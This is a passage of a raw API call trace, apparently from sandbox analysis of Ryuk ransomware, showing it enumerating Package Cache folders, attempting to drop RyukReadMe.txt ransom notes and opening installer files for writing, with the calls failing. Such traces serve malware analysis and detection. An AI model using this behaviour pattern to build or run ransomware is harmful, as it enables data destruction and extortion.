lpFindFileData=0x29ad240) returned 0 [0140.838] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0140.838] SetLastError (dwErrCode=0x0) [0140.838] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.838] GetLastError () returned 0x5 [0140.838] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.839] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.839] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.839] SetLastError (dwErrCode=0x0) [0140.839] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.839] GetLastError () returned 0x5 [0140.839] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.839] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.839] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0140.839] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.839] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.839] SetLastError (dwErrCode=0x0) [0140.840] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.840] GetLastError () returned 0x5 [0140.840] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0140.840] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.840] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0140.840] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.840] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.840] SetLastError (dwErrCode=0x0) [0140.840] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.841] GetLastError () returned 0x5 [0140.841] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0140.841] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.841] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0140.841] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.841] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.841] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.841] SetFileAttributesW (lpFileName="C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab", dwFileAttributes=0x80) returned 0 [0140.842] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.842] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.842] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.842] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.842] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.842] SetFileAttributesW (lpFileName="C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi", dwFileAttributes=0x80) returned 0 [0140.843] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.843] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.843] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.843] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0140.843] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0140.843] SetLastError (dwErrCode=0x0) [0140.843] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.843] GetLastError () returned 0x5 [0140.843] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0140.843] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.843] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0140.843] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0140.843] SetLastError (dwErrCode=0x0) [0140.843] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.843] GetLastError () returned 0x5 [0140.843] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0140.846] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.846] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0140.846] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0140.846] SetLastError (dwErrCode=0x0) [0140.846] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.846] GetLastError () returned 0x5 [0140.847] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.847] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.847] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.847] SetLastError (dwErrCode=0x0) [0140.847] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.847] GetLastError () returned 0x5 [0140.847] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.847] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.847] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0140.847] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.847] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.847] SetLastError (dwErrCode=0x0) [0140.847] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.847] GetLastError () returned 0x5 [0140.847] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0140.847] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.847] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0140.848] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.848] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.848] SetLastError (dwErrCode=0x0) [0140.848] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.848] GetLastError () returned 0x5 [0140.848] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0140.848] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.848] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0140.849] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.849] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.849] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.849] SetFileAttributesW (lpFileName="C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab", dwFileAttributes=0x80) returned 0 [0140.849] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.849] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.850] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.850] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.850] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0140.850] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0140.850] SetLastError (dwErrCode=0x0) [0140.850] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.850] GetLastError () returned 0x5 [0140.850] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0140.850] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.850] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0140.850] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0140.850] SetLastError (dwErrCode=0x0) [0140.850] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.850] GetLastError () returned 0x5 [0140.850] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0140.850] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.850] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0140.850] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0140.851] SetLastError (dwErrCode=0x0) [0140.851] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.851] GetLastError () returned 0x5 [0140.851] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.851] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.851] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.851] SetLastError (dwErrCode=0x0) [0140.851] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.851] GetLastError () returned 0x5 [0140.851] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.851] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.851] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0140.852] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.852] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.852] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.852] SetFileAttributesW (lpFileName="C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm", dwFileAttributes=0x80) returned 0 [0140.853] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.853] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.853] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.853] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.853] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0140.853] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0140.854] SetLastError (dwErrCode=0x0) [0140.854] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.854] GetLastError () returned 0x5 [0140.854] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.854] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.854] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.854] SetLastError (dwErrCode=0x0) [0140.854] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.854] GetLastError () returned 0x5 [0140.854] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.854] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.854] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0140.855] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.855] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.855] SetLastError (dwErrCode=0x0) [0140.855] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.855] GetLastError () returned 0x5 [0140.855] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0140.855] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.856] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0140.856] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.856] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.856] SetLastError (dwErrCode=0x0) [0140.856] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.856] GetLastError () returned 0x5 [0140.856] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0140.856] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.856] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0140.856] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.856] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.856] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.856] SetFileAttributesW (lpFileName="C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab", dwFileAttributes=0x80) returned 0 [0140.857] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.857] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.857] 